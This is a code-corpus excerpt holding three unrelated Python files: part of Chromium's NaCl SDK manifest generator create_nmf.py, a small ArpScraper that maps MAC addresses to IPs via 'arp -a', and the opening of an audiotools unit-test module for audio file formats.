# Staging subdirectory for each architecture's shared libraries.
ARCH_LOCATION = {
    'x86-32': 'lib32',
    'x86-64': 'lib64',
    'arm': 'lib',
}

# These constants are used within nmf files.
RUNNABLE_LD = 'runnable-ld.so'  # Name of the dynamic loader
MAIN_NEXE = 'main.nexe'  # Name of entry point for execution
PROGRAM_KEY = 'program'  # Key of the program section in an nmf file
URL_KEY = 'url'  # Key of the url field for a particular file in an nmf file
FILES_KEY = 'files'  # Key of the files section in an nmf file
PNACL_OPTLEVEL_KEY = 'optlevel'  # key for PNaCl optimization level
PORTABLE_KEY = 'portable'  # key for portable section of manifest
TRANSLATE_KEY = 'pnacl-translate'  # key for translatable objects

# The proper name of the dynamic linker, as kept in the IRT. This is
# excluded from the nmf file by convention.
LD_NACL_MAP = {
    'x86-32': 'ld-nacl-x86-32.so.1',
    'x86-64': 'ld-nacl-x86-64.so.1',
    'arm': None,
}
def DebugPrint(message):
  """Emit |message| to stderr, but only when debug mode is switched on."""
  if not DebugPrint.debug_mode:
    return
  sys.stderr.write('%s\n' % message)

DebugPrint.debug_mode = False  # Set to True to enable extra debug prints
def MakeDir(dirname):
  """Create |dirname| (and missing parents), tolerating "already exists".

  Behaves like os.makedirs() except that an existing directory is not an
  error; any other OSError is re-raised.
  """
  if os.path.isdir(dirname):
    return
  Trace("mkdir: %s" % dirname)
  try:
    os.makedirs(dirname)
  except OSError as err:
    # The directory may have appeared between the isdir() check and here.
    if err.errno != errno.EEXIST:
      raise
class Error(Exception):
  '''Base exception for all errors raised by this script.'''
def ParseElfHeader(path):
  """Determine properties of a nexe by parsing elf header.
  Return tuple of architecture and boolean signalling whether
  the executable is dynamic (has INTERP header) or static.
  """
  # From elf.h:
  # typedef struct
  # {
  #   unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
  #   Elf64_Half e_type; /* Object file type */
  #   Elf64_Half e_machine; /* Architecture */
  #   ...
  # } Elf32_Ehdr;
  # Only e_ident and e_machine are needed, so unpack just the first
  # 16 + 2 + 2 bytes (layout is identical for 32- and 64-bit ELF).
  elf_header_format = '16s2H'
  elf_header_size = struct.calcsize(elf_header_format)

  with open(path, 'rb') as f:
    header = f.read(elf_header_size)

  try:
    header = struct.unpack(elf_header_format, header)
  except struct.error:
    raise Error("error parsing elf header: %s" % path)
  e_ident, _, e_machine = header[:3]

  # NOTE(review): e_ident is a byte string; comparing it against the str
  # literal '\x7fELF' only matches on Python 2 -- confirm before porting
  # this script to Python 3.
  elf_magic = '\x7fELF'
  if e_ident[:4] != elf_magic:
    raise Error('Not a valid NaCl executable: %s' % path)

  # EM_386 / EM_ARM / EM_X86_64 machine numbers.
  e_machine_mapping = {
    3 : 'x86-32',
    40 : 'arm',
    62 : 'x86-64'
  }
  if e_machine not in e_machine_mapping:
    raise Error('Unknown machine type: %s' % e_machine)

  # Set arch based on the machine type in the elf header
  arch = e_machine_mapping[e_machine]

  # Now read the full header in either 64bit or 32bit mode
  dynamic = IsDynamicElf(path, arch == 'x86-64')
  return arch, dynamic
def IsDynamicElf(path, is64bit):
  """Examine an elf file to determine if it is dynamically
  linked or not.
  This is determined by searching the program headers for
  a header of type PT_INTERP.
  """
  PT_INTERP = 3
  # Elf32_Ehdr / Elf64_Ehdr layouts; only e_phoff (index 5),
  # e_phentsize (index 9) and e_phnum (index 10) are used below.
  if is64bit:
    ehdr_format = '16s2HI3QI3H'
  else:
    ehdr_format = '16s2HI3II3H'

  with open(path, 'rb') as f:
    ehdr = struct.unpack(ehdr_format, f.read(struct.calcsize(ehdr_format)))
    phoff, phentsize, phnum = ehdr[5], ehdr[9], ehdr[10]
    f.seek(phoff)
    phdrs = f.read(phentsize * phnum)

  # The segment type (p_type) is the first 32-bit word of every Phdr.
  while phdrs:
    entry, phdrs = phdrs[:phentsize], phdrs[phentsize:]
    if struct.unpack('I', entry[:4])[0] == PT_INTERP:
      return True
  return False
class ArchFile(object):
  '''Metadata about a single file referenced from the manifest.

  Attributes:
    name: Name of this file
    path: Full path to this file on the build system
    arch: Architecture of this file (e.g., x86-32)
    url: Relative path to file in the staged web directory.
        Used for specifying the "url" attribute in the nmf file.'''

  def __init__(self, name, path, url, arch=None):
    self.name = name
    self.path = path
    self.url = url
    # When the caller doesn't know the architecture, sniff it from the
    # file's ELF header.
    self.arch = arch if arch else ParseElfHeader(path)[0]

  def __repr__(self):
    return '<ArchFile %s>' % self.path

  def __str__(self):
    '''Return the file path when invoked with the str() function'''
    return self.path
class NmfUtils(object):
  '''Helper class for creating and managing nmf files

  Attributes:
    manifest: A JSON-structured dict containing the nmf structure
    needed: A dict with key=filename and value=ArchFile (see GetNeeded)
  '''

  def __init__(self, main_files=None, objdump=None,
               lib_path=None, extra_files=None, lib_prefix=None,
               remap=None, pnacl_optlevel=None):
    '''Constructor

    Args:
      main_files: List of main entry program files.  These will be named
          files->main.nexe for dynamic nexes, and program for static nexes
      objdump: path to x86_64-nacl-objdump tool (or Linux equivalent)
      lib_path: List of paths to library directories
      extra_files: List of extra files to include in the nmf
      lib_prefix: A list of path components to prepend to the library paths,
          both for staging the libraries and for inclusion into the nmf file.
          Examples:  ['..'], ['lib_dir']
      remap: Remaps the library name in the manifest.
      pnacl_optlevel: Optimization level for PNaCl translation.
    '''
    self.objdump = objdump
    self.main_files = main_files or []
    self.extra_files = extra_files or []
    self.lib_path = lib_path or []
    self.manifest = None
    self.needed = {}
    self.lib_prefix = lib_prefix or []
    self.remap = remap or {}
    # A .pexe as the first main file switches the whole tool to PNaCl mode.
    self.pnacl = main_files and main_files[0].endswith('pexe')
    self.pnacl_optlevel = pnacl_optlevel

    # Fail early if any of the input files are missing.
    for filename in self.main_files:
      if not os.path.exists(filename):
        raise Error('Input file not found: %s' % filename)
      if not os.path.isfile(filename):
        raise Error('Input is not a file: %s' % filename)

  def GleanFromObjdump(self, files, arch):
    '''Get architecture and dependency information for given files

    Args:
      files: A list of files to examine.
          [ '/path/to/my.nexe',
            '/path/to/lib64/libmy.so',
            '/path/to/mydata.so',
            '/path/to/my.data' ]
      arch: The architecure we are looking for, or None to accept any
          architecture.

    Returns: A tuple with the following members:
      input_info: A dict with key=filename and value=ArchFile of input files.
          Includes the input files as well, with arch filled in if absent.
          Example: { '/path/to/my.nexe': ArchFile(my.nexe),
                     '/path/to/libfoo.so': ArchFile(libfoo.so) }
      needed: A set of strings formatted as "arch/name".  Example:
          set(['x86-32/libc.so', 'x86-64/libgcc.so'])
    '''
    if not self.objdump:
      self.objdump = FindObjdumpExecutable()
      if not self.objdump:
        raise Error('No objdump executable found (see --help for more info)')

    # Resolve bare library names against the library search path.
    full_paths = set()
    for filename in files:
      if os.path.exists(filename):
        full_paths.add(filename)
      else:
        for path in self.FindLibsInPath(filename):
          full_paths.add(path)

    # One objdump invocation covers all the files at once.
    cmd = [self.objdump, '-p'] + list(full_paths)
    DebugPrint('GleanFromObjdump[%s](%s)' % (arch, cmd))
    env = {'LANG': 'en_US.UTF-8'}
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, bufsize=-1,
                            env=env)

    input_info = {}
    found_basenames = set()
    needed = set()
    output, err_output = proc.communicate()
    if proc.returncode:
      raise Error('%s\nStdError=%s\nobjdump failed with error code: %d' %
                  (output, err_output, proc.returncode))

    file_arch = None
    for line in output.splitlines(True):
      # Objdump should display the architecture first and then the dependencies
      # second for each file in the list.
      matched = FormatMatcher.match(line)
      if matched:
        filename = matched.group(1)
        file_arch = OBJDUMP_ARCH_MAP[matched.group(2)]
        if arch and file_arch != arch:
          continue
        name = os.path.basename(filename)
        found_basenames.add(name)
        input_info[filename] = ArchFile(
            arch=file_arch,
            name=name,
            path=filename,
            url='/'.join(self.lib_prefix + [ARCH_LOCATION[file_arch], name]))
      matched = NeededMatcher.match(line)
      if matched:
        assert file_arch is not None
        match = '/'.join([file_arch, matched.group(1)])
        needed.add(match)
        Trace("NEEDED: %s" % match)

    for filename in files:
      if os.path.basename(filename) not in found_basenames:
        raise Error('Library not found [%s]: %s' % (arch, filename))

    return input_info, needed

  def FindLibsInPath(self, name):
    '''Finds the set of libraries matching |name| within lib_path

    Args:
      name: name of library to find

    Returns:
      A list of system paths that match the given name within the lib_path'''
    files = []
    for dirname in self.lib_path:
      filename = os.path.join(dirname, name)
      if os.path.exists(filename):
        files.append(filename)
    if not files:
      raise Error('cannot find library %s' % name)
    return files

  def GetNeeded(self):
    '''Collect the list of dependencies for the main_files

    Returns:
      A dict with key=filename and value=ArchFile of input files.
          Includes the input files as well, with arch filled in if absent.
          Example: { '/path/to/my.nexe': ArchFile(my.nexe),
                     '/path/to/libfoo.so': ArchFile(libfoo.so) }'''
    # Results are memoized across calls.
    if self.needed:
      return self.needed

    DebugPrint('GetNeeded(%s)' % self.main_files)

    dynamic = any(ParseElfHeader(f)[1] for f in self.main_files)

    if dynamic:
      # Transitively walk NEEDED entries, grouping queries by architecture,
      # until no unexamined dependencies remain.
      examined = set()
      all_files, unexamined = self.GleanFromObjdump(self.main_files, None)
      for arch_file in all_files.itervalues():
        arch_file.url = arch_file.path
        if unexamined:
          unexamined.add('/'.join([arch_file.arch, RUNNABLE_LD]))

      while unexamined:
        files_to_examine = {}

        # Take all the currently unexamined files and group them
        # by architecture.
        for arch_name in unexamined:
          arch, name = arch_name.split('/')
          files_to_examine.setdefault(arch, []).append(name)

        # Call GleanFromObjdump() for each architecture.
        needed = set()
        for arch, files in files_to_examine.iteritems():
          new_files, new_needed = self.GleanFromObjdump(files, arch)
          all_files.update(new_files)
          needed |= new_needed

        examined |= unexamined
        unexamined = needed - examined

      # With the runnable-ld.so scheme we have today, the proper name of
      # the dynamic linker should be excluded from the list of files.
      ldso = [LD_NACL_MAP[arch] for arch in set(OBJDUMP_ARCH_MAP.values())]
      for name, arch_file in all_files.items():
        if arch_file.name in ldso:
          del all_files[name]

      self.needed = all_files
    else:
      # Static nexes have no library dependencies: only the inputs go in.
      for filename in self.main_files:
        url = os.path.split(filename)[1]
        archfile = ArchFile(name=os.path.basename(filename),
                            path=filename, url=url)
        self.needed[filename] = archfile

    return self.needed

  def StageDependencies(self, destination_dir):
    '''Copies over the dependencies into a given destination directory

    Each library will be put into a subdirectory that corresponds to the arch.

    Args:
      destination_dir: The destination directory for staging the dependencies
    '''
    nexe_root = os.path.dirname(os.path.abspath(self.main_files[0]))
    nexe_root = os.path.normcase(nexe_root)

    needed = self.GetNeeded()
    for arch_file in needed.itervalues():
      urldest = arch_file.url
      source = arch_file.path

      # for .nexe and .so files specified on the command line stage
      # them in paths relative to the .nexe (with the .nexe always
      # being staged at the root).
      if source in self.main_files:
        absdest = os.path.normcase(os.path.abspath(urldest))
        if absdest.startswith(nexe_root):
          urldest = os.path.relpath(urldest, nexe_root)

      destination = os.path.join(destination_dir, urldest)

      # Skip copies onto themselves.
      if (os.path.normcase(os.path.abspath(source)) ==
          os.path.normcase(os.path.abspath(destination))):
        continue

      # make sure target dir exists
      MakeDir(os.path.dirname(destination))

      Trace('copy: %s -> %s' % (source, destination))
      shutil.copy2(source, destination)

  def _GeneratePNaClManifest(self):
    # PNaCl manifests are trivial: a single portable pexe under
    # "pnacl-translate", plus optional translation options.
    manifest = {}
    manifest[PROGRAM_KEY] = {}
    manifest[PROGRAM_KEY][PORTABLE_KEY] = {}
    translate_dict = {
        "url": os.path.basename(self.main_files[0]),
    }
    if self.pnacl_optlevel is not None:
      translate_dict[PNACL_OPTLEVEL_KEY] = self.pnacl_optlevel
    manifest[PROGRAM_KEY][PORTABLE_KEY][TRANSLATE_KEY] = translate_dict
    self.manifest = manifest

  def _GenerateManifest(self):
    '''Create a JSON formatted dict containing the files

    NaCl will map url requests based on architecture.  The startup NEXE
    can always be found under the top key PROGRAM.  Additional files are under
    the FILES key further mapped by file name.  In the case of 'runnable' the
    PROGRAM key is populated with urls pointing the runnable-ld.so which acts
    as the startup nexe.  The application itself is then placed under the
    FILES key mapped as 'main.exe' instead of the original name so that the
    loader can find it. '''
    manifest = { FILES_KEY: {}, PROGRAM_KEY: {} }

    needed = self.GetNeeded()

    runnable = any(n.endswith(RUNNABLE_LD) for n in needed)

    extra_files_kv = [(key, ArchFile(name=key,
                                     arch=arch,
                                     path=url,
                                     url=url))
                      for key, arch, url in self.extra_files]

    nexe_root = os.path.dirname(os.path.abspath(self.main_files[0]))

    for need, archinfo in needed.items() + extra_files_kv:
      urlinfo = { URL_KEY: archinfo.url }
      name = archinfo.name

      # If starting with runnable-ld.so, make that the main executable.
      if runnable:
        if need.endswith(RUNNABLE_LD):
          manifest[PROGRAM_KEY][archinfo.arch] = urlinfo
          continue

      if need in self.main_files:
        # Ensure that the .nexe and .so names are relative to the root
        # of where the .nexe lives.
        if os.path.abspath(urlinfo[URL_KEY]).startswith(nexe_root):
          urlinfo[URL_KEY] = os.path.relpath(urlinfo[URL_KEY], nexe_root)

        if need.endswith(".nexe"):
          # Place it under program if we aren't using the runnable-ld.so.
          if not runnable:
            manifest[PROGRAM_KEY][archinfo.arch] = urlinfo
            continue
          # Otherwise, treat it like another another file named main.nexe.
          name = MAIN_NEXE

      name = self.remap.get(name, name)
      fileinfo = manifest[FILES_KEY].get(name, {})
      fileinfo[archinfo.arch] = urlinfo
      manifest[FILES_KEY][name] = fileinfo

    self.manifest = manifest

  def GetManifest(self):
    '''Returns a JSON-formatted dict containing the NaCl dependencies'''
    if not self.manifest:
      if self.pnacl:
        self._GeneratePNaClManifest()
      else:
        self._GenerateManifest()
    return self.manifest

  def GetJson(self):
    '''Returns the Manifest as a JSON-formatted string'''
    pretty_string = json.dumps(self.GetManifest(), indent=2)
    # json.dumps sometimes returns trailing whitespace and does not put
    # a newline at the end.  This code fixes these problems.
    pretty_lines = pretty_string.split('\n')
    return '\n'.join([line.rstrip() for line in pretty_lines]) + '\n'
def Trace(msg):
  """Write |msg| to stderr, but only when Trace.verbose is set."""
  if not Trace.verbose:
    return
  sys.stderr.write(str(msg) + '\n')

Trace.verbose = False
def ParseExtraFiles(encoded_list, err):
  """Parse the extra-files list and return a canonicalized list of
  [key, arch, url] triples.  The |encoded_list| should be a list of
  strings of the form 'key:url' or 'key:arch:url', where an omitted
  'arch' is taken to mean 'portable'.

  All entries in |encoded_list| are checked for syntax errors before
  returning.  Error messages are written to |err| (typically
  sys.stderr) so that the user has actionable feedback for fixing all
  errors, rather than one at a time.  If there are any errors, None is
  returned instead of a list, since an empty list is a valid return
  value.
  """
  seen_error = False
  canonicalized = []
  for kv in encoded_list:
    # quote.unquote() returns the fields interleaved with the separators.
    unquoted = quote.unquote(kv, ':')
    if len(unquoted) == 3:
      # 'key:url' form -- arch defaults to 'portable'.
      if unquoted[1] != ':':
        err.write('Syntax error for key:value tuple ' +
                  'for --extra-files argument: ' + kv + '\n')
        seen_error = True
      else:
        canonicalized.append([unquoted[0], 'portable', unquoted[2]])
    elif len(unquoted) == 5:
      # 'key:arch:url' form.
      if unquoted[1] != ':' or unquoted[3] != ':':
        err.write('Syntax error for key:arch:url tuple ' +
                  'for --extra-files argument: ' +
                  kv + '\n')
        seen_error = True
      else:
        canonicalized.append([unquoted[0], unquoted[2], unquoted[4]])
    else:
      err.write('Bad key:arch:url tuple for --extra-files: ' + kv + '\n')
  if seen_error:
    return None
  return canonicalized
def GetSDKRoot():
  """Determine current NACL_SDK_ROOT, either via the environment variable
  itself, or by attempting to derive it from the location of this script.
  """
  sdk_root = os.environ.get('NACL_SDK_ROOT')
  if sdk_root:
    return sdk_root
  # Fall back to the parent of this script's directory, sanity-checking
  # that it actually looks like an SDK checkout.
  candidate = os.path.dirname(SCRIPT_DIR)
  if not os.path.exists(os.path.join(candidate, 'toolchain')):
    return None
  return candidate
def FindObjdumpExecutable():
  """Derive path to objdump executable to use for determining shared
  object dependencies.
  """
  sdk_root = GetSDKRoot()
  if not sdk_root:
    return None

  osname = getos.GetPlatform()
  objdump = os.path.join(sdk_root, 'toolchain', '%s_x86_glibc' % osname,
                         'bin', 'x86_64-nacl-objdump')
  if osname == 'win':
    objdump += '.exe'

  if not os.path.exists(objdump):
    sys.stderr.write('WARNING: failed to find objdump in default '
                     'location: %s' % objdump)
    return None

  return objdump
def GetDefaultLibPath(config):
  """Derive default library path to use when searching for shared
  objects.  This currently include the toolchain library folders
  as well as the top level SDK lib folder and the naclports lib
  folder.  We include both 32-bit and 64-bit library paths.
  """
  assert(config in ('Debug', 'Release'))
  sdk_root = GetSDKRoot()
  if not sdk_root:
    # TOOD(sbc): output a warning here? We would also need to suppress
    # the warning when run from the chromium build.
    return []

  osname = getos.GetPlatform()
  libpath = [
    # Core toolchain libraries
    'toolchain/%s_x86_glibc/x86_64-nacl/lib' % osname,
    'toolchain/%s_x86_glibc/x86_64-nacl/lib32' % osname,
    # naclports installed libraries
    'toolchain/%s_x86_glibc/x86_64-nacl/usr/lib' % osname,
    'toolchain/%s_x86_glibc/i686-nacl/usr/lib' % osname,
    # SDK bundle libraries
    'lib/glibc_x86_32/%s' % config,
    'lib/glibc_x86_64/%s' % config,
    # naclports bundle libraries
    'ports/lib/glibc_x86_32/%s' % config,
    'ports/lib/glibc_x86_64/%s' % config,
  ]
  # Normalize and anchor every entry under the SDK root in one pass.
  return [os.path.join(sdk_root, os.path.normpath(p)) for p in libpath]
def main(argv):
  """Command-line entry point.

  Parses options, writes the generated .nmf to stdout or --output, and
  optionally stages shared-library dependencies.  Returns 0 on success.
  """
  parser = optparse.OptionParser(
      usage='Usage: %prog [options] nexe [extra_libs...]', description=__doc__)
  parser.add_option('-o', '--output', dest='output',
                    help='Write manifest file to FILE (default is stdout)',
                    metavar='FILE')
  parser.add_option('-D', '--objdump', dest='objdump',
                    help='Override the default "objdump" tool used to find '
                         'shared object dependencies',
                    metavar='TOOL')
  parser.add_option('--no-default-libpath', action='store_true',
                    help="Don't include the SDK default library paths")
  parser.add_option('--debug-libs', action='store_true',
                    help='Use debug library paths when constructing default '
                         'library path.')
  parser.add_option('-L', '--library-path', dest='lib_path',
                    action='append', default=[],
                    help='Add DIRECTORY to library search path',
                    metavar='DIRECTORY')
  parser.add_option('-P', '--path-prefix', dest='path_prefix', default='',
                    help='A path to prepend to shared libraries in the .nmf',
                    metavar='DIRECTORY')
  parser.add_option('-s', '--stage-dependencies', dest='stage_dependencies',
                    help='Destination directory for staging libraries',
                    metavar='DIRECTORY')
  parser.add_option('-t', '--toolchain', help='Legacy option, do not use')
  parser.add_option('-n', '--name', dest='name',
                    help='Rename FOO as BAR',
                    action='append', default=[], metavar='FOO,BAR')
  parser.add_option('-x', '--extra-files',
                    help=('Add extra key:file tuple to the "files"' +
                          ' section of the .nmf'),
                    action='append', default=[], metavar='FILE')
  parser.add_option('-O', '--pnacl-optlevel',
                    help='Set the optimization level to N in PNaCl manifests',
                    metavar='N')
  parser.add_option('-v', '--verbose',
                    help='Verbose output', action='store_true')
  parser.add_option('-d', '--debug-mode',
                    help='Debug mode', action='store_true')

  # To enable bash completion for this command first install optcomplete
  # and then add this line to your .bashrc:
  #  complete -F _optcomplete create_nmf.py
  try:
    import optcomplete
    optcomplete.autocomplete(parser)
  except ImportError:
    pass

  options, args = parser.parse_args(argv)
  if options.verbose:
    Trace.verbose = True
  if options.debug_mode:
    DebugPrint.debug_mode = True

  if options.toolchain is not None:
    sys.stderr.write('warning: option -t/--toolchain is deprecated.\n')

  if len(args) < 1:
    parser.error('No nexe files specified. See --help for more info')

  canonicalized = ParseExtraFiles(options.extra_files, sys.stderr)
  if canonicalized is None:
    parser.error('Bad --extra-files (-x) argument syntax')

  # Build the old-name -> new-name remapping table from repeated --name.
  remap = {}
  for ren in options.name:
    parts = ren.split(',')
    if len(parts) != 2:
      parser.error('Expecting --name=<orig_arch.so>,<new_name.so>')
    remap[parts[0]] = parts[1]

  if options.path_prefix:
    path_prefix = options.path_prefix.split('/')
  else:
    path_prefix = []

  # Bad library paths are reported but not fatal.
  for libpath in options.lib_path:
    if not os.path.exists(libpath):
      sys.stderr.write('Specified library path does not exist: %s\n' % libpath)
    elif not os.path.isdir(libpath):
      sys.stderr.write('Specified library is not a directory: %s\n' % libpath)

  if not options.no_default_libpath:
    # Add default libraries paths to the end of the search path.
    config = options.debug_libs and 'Debug' or 'Release'
    options.lib_path += GetDefaultLibPath(config)

  pnacl_optlevel = None
  if options.pnacl_optlevel is not None:
    pnacl_optlevel = int(options.pnacl_optlevel)
    # Out-of-range values are warned about but still passed through.
    if pnacl_optlevel < 0 or pnacl_optlevel > 3:
      sys.stderr.write(
          'warning: PNaCl optlevel %d is unsupported (< 0 or > 3)\n' %
          pnacl_optlevel)

  nmf = NmfUtils(objdump=options.objdump,
                 main_files=args,
                 lib_path=options.lib_path,
                 extra_files=canonicalized,
                 lib_prefix=path_prefix,
                 remap=remap,
                 pnacl_optlevel=pnacl_optlevel)

  nmf.GetManifest()
  if not options.output:
    sys.stdout.write(nmf.GetJson())
  else:
    with open(options.output, 'w') as output:
      output.write(nmf.GetJson())

  if options.stage_dependencies and not nmf.pnacl:
    Trace('Staging dependencies...')
    nmf.StageDependencies(options.stage_dependencies)

  return 0
if __name__ == '__main__':
    try:
        rtn = main(sys.argv[1:])
    # NOTE: Python 2 "except ExcClass, name" syntax; Error is this
    # script's own exception base, defined earlier in the file.
    except Error, e:
        sys.stderr.write('%s: %s\n' % (os.path.basename(__file__), e))
        rtn = 1
    except KeyboardInterrupt:
        # Ctrl-C exits cleanly with a short message instead of a traceback
        sys.stderr.write('%s: interrupted\n' % os.path.basename(__file__))
        rtn = 1
    sys.exit(rtn)
| ChromiumWebApps/chromium | native_client_sdk/src/tools/create_nmf.py | Python | bsd-3-clause | 26,299 |
import re
import subprocess
class ArpScraper(object):
    """Look up IP addresses for MAC addresses via the system ARP cache.

    Shells out to ``arp -a`` and scrapes its output.  Only tested on
    Ubuntu 14.04.  A cursory search for python arp libraries returned
    immature libraries focused on crafting arp packets rather than
    querying known system data, so here we are.
    """

    # Dots are escaped so they only match literal '.' separators
    # (the previous pattern's bare '.' matched *any* character, so
    # strings like "10a0b0c1" were accepted as IP addresses).
    ip_re = re.compile(r'[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
    # MAC octets restricted to hex digits instead of arbitrary characters.
    mac_re = re.compile(r'[0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5}')

    def __init__(self):
        pass

    def ip_lookup(self, mac_addresses=None):
        """Return a list of (mac, ip) tuples for the given MACs.

        MACs absent from the ARP cache map to "".  `mac_addresses`
        defaults to an empty list (None sentinel avoids the shared
        mutable-default-argument pitfall).
        """
        if mac_addresses is None:
            mac_addresses = []
        arp_dict = self.parse_system_arp()
        return [(mac, arp_dict.get(mac, "")) for mac in mac_addresses]

    def parse_system_arp(self):
        """Run ``arp -a`` and parse its output into a {mac: ip} dict."""
        arp_dict = {}
        # universal_newlines=True yields text on both Python 2 and 3;
        # without it, Python 3 returns bytes and split('\n') fails.
        arp_out = subprocess.check_output(['arp', '-a'],
                                          universal_newlines=True)
        for line in arp_out.split('\n'):
            try:
                ip = self.ip_re.search(line).group(0)
                mac = self.mac_re.search(line).group(0)
            except AttributeError:
                # .search() returned None: line has no IP/MAC (e.g. an
                # "<incomplete>" entry or a header line) -- skip it.
                continue
            arp_dict[mac] = ip
        return arp_dict
| timfreund/ceph-libvirt-clusterer | cephlvc/network.py | Python | mit | 1,099 |
#!/usr/bin/python
#Audio Tools, a module and set of tools for manipulating audio data
#Copyright (C) 2007-2012 Brian Langenberger
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import unittest
import audiotools
import tempfile
import os
import os.path
from hashlib import md5
import random
import decimal
import test_streams
import cStringIO
import subprocess
import struct
from test import (parser,
BLANK_PCM_Reader, RANDOM_PCM_Reader,
EXACT_BLANK_PCM_Reader, EXACT_SILENCE_PCM_Reader,
Variable_Reader,
EXACT_RANDOM_PCM_Reader, MD5_Reader,
Join_Reader, FrameCounter,
Combinations,
TEST_COVER1, TEST_COVER2, TEST_COVER3,
HUGE_BMP)
def do_nothing(self):
    """No-op stand-in; disabled test methods are swapped for this."""
    return None
#add a bunch of decorator metafunctions like LIB_CORE
#which can be wrapped around individual tests as needed
#
#For each (section, option) pair in the test configuration a module-level
#name SECTION_OPTION is created:
#  - option enabled  -> identity decorator, the test runs unchanged
#  - option disabled -> decorator that replaces the test with do_nothing
for section in parser.sections():
    for option in parser.options(section):
        if (parser.getboolean(section, option)):
            vars()["%s_%s" % (section.upper(),
                              option.upper())] = lambda function: function
        else:
            vars()["%s_%s" % (section.upper(),
                              option.upper())] = lambda function: do_nothing
class ERROR_PCM_Reader(audiotools.PCMReader):
    """A PCMReader that eventually raises a given exception from read().

    Produces all-zero frames until its failure chance triggers, so
    callers can exercise error paths after some "live" PCM has been
    generated.
    """

    def __init__(self, error,
                 sample_rate=44100, channels=2, bits_per_sample=16,
                 channel_mask=None, failure_chance=.2, minimum_successes=0):
        if channel_mask is None:
            # derive a default mask from the channel count
            channel_mask = audiotools.ChannelMask.from_channels(channels)
        audiotools.PCMReader.__init__(
            self,
            file=None,
            sample_rate=sample_rate,
            channels=channels,
            bits_per_sample=bits_per_sample,
            channel_mask=channel_mask)
        self.error = error

        # failure_chance is the probability of raising on a given read();
        # minimum_successes reads are guaranteed to succeed first so we
        # can generate some "live" PCM data before erroring out
        self.failure_chance = failure_chance
        self.minimum_successes = minimum_successes

        # a single all-zero frame, repeated to satisfy each read()
        self.frame = audiotools.pcm.from_list([0] * self.channels,
                                              self.channels,
                                              self.bits_per_sample,
                                              True)

    def read(self, pcm_frames):
        if self.minimum_successes > 0:
            # still inside the guaranteed-success window
            self.minimum_successes -= 1
            return audiotools.pcm.from_frames([self.frame] * pcm_frames)
        if random.random() <= self.failure_chance:
            raise self.error
        return audiotools.pcm.from_frames([self.frame] * pcm_frames)

    def close(self):
        pass
class Log:
    """Records every progress-callback invocation for later inspection."""

    def __init__(self):
        # one tuple of positional arguments per update() call,
        # in call order
        self.results = []

    def update(self, *args):
        """Append this call's positional arguments as a tuple."""
        self.results += [args]
class AudioFileTest(unittest.TestCase):
    """Base test case for AudioFile subclasses.

    Subclasses override setUp() to point self.audio_class at a concrete
    format; every test early-returns when audio_class is still the
    abstract audiotools.AudioFile base.
    """

    def setUp(self):
        # subclasses replace audio_class with a concrete format class
        self.audio_class = audiotools.AudioFile
        self.suffix = "." + self.audio_class.SUFFIX

    # opening nonexistent, empty, junk-prefixed or unreadable files
    # must raise InvalidFile
    @FORMAT_AUDIOFILE
    def test_init(self):
        if (self.audio_class is audiotools.AudioFile):
            return

        #first check nonexistent files
        self.assertRaises(audiotools.InvalidFile,
                          self.audio_class,
                          "/dev/null/foo.%s" % (self.audio_class.SUFFIX))

        f = tempfile.NamedTemporaryFile(suffix="." + self.audio_class.SUFFIX)
        try:
            #then check empty files
            f.write("")
            f.flush()
            self.assertEqual(os.path.isfile(f.name), True)
            self.assertRaises(audiotools.InvalidFile,
                              self.audio_class,
                              f.name)

            #then check files with a bit of junk at the beginning
            f.write("".join(map(chr,
                                [26, 83, 201, 240, 73, 178, 34, 67, 87, 214])))
            f.flush()
            self.assert_(os.path.getsize(f.name) > 0)
            self.assertRaises(audiotools.InvalidFile,
                              self.audio_class,
                              f.name)

            #finally, check unreadable files
            original_stat = os.stat(f.name)[0]
            try:
                os.chmod(f.name, 0)
                self.assertRaises(audiotools.InvalidFile,
                                  self.audio_class,
                                  f.name)
            finally:
                os.chmod(f.name, original_stat)
        finally:
            f.close()

    # audiotools.file_type() must identify valid files and reject
    # random data
    @FORMAT_AUDIOFILE
    def test_is_type(self):
        if (self.audio_class is audiotools.AudioFile):
            return

        valid = tempfile.NamedTemporaryFile(suffix=self.suffix)
        invalid = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            #generate a valid file and check audiotools.file_type
            self.audio_class.from_pcm(valid.name, BLANK_PCM_Reader(1))
            self.assertEqual(audiotools.file_type(open(valid.name, "rb")),
                             self.audio_class)

            #several invalid files and ensure audiotools.file_type
            #returns None
            #(though it's *possible* os.urandom might generate a valid file
            # by virtue of being random that's extremely unlikely in practice)
            for i in xrange(256):
                self.assertEqual(os.path.getsize(invalid.name), i)
                self.assertEqual(
                    audiotools.file_type(open(invalid.name, "rb")),
                    None)
                invalid.write(os.urandom(1))
                invalid.flush()
        finally:
            valid.close()
            invalid.close()

    # round-trip bits-per-sample through encode and reopen
    @FORMAT_AUDIOFILE
    def test_bits_per_sample(self):
        if (self.audio_class is audiotools.AudioFile):
            return

        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            for bps in (8, 16, 24):
                track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
                    1, bits_per_sample=bps))
                self.assertEqual(track.bits_per_sample(), bps)
                track2 = audiotools.open(temp.name)
                self.assertEqual(track2.bits_per_sample(), bps)
        finally:
            temp.close()

    # placeholder: implemented by subclasses (always fails if enabled here)
    @FORMAT_AUDIOFILE_PLACEHOLDER
    def test_channels(self):
        self.assert_(False)

    @FORMAT_AUDIOFILE_PLACEHOLDER
    def test_channel_mask(self):
        self.assert_(False)

    @FORMAT_AUDIOFILE_PLACEHOLDER
    def test_sample_rate(self):
        self.assert_(False)

    @FORMAT_AUDIOFILE_PLACEHOLDER
    def test_lossless(self):
        self.assert_(False)

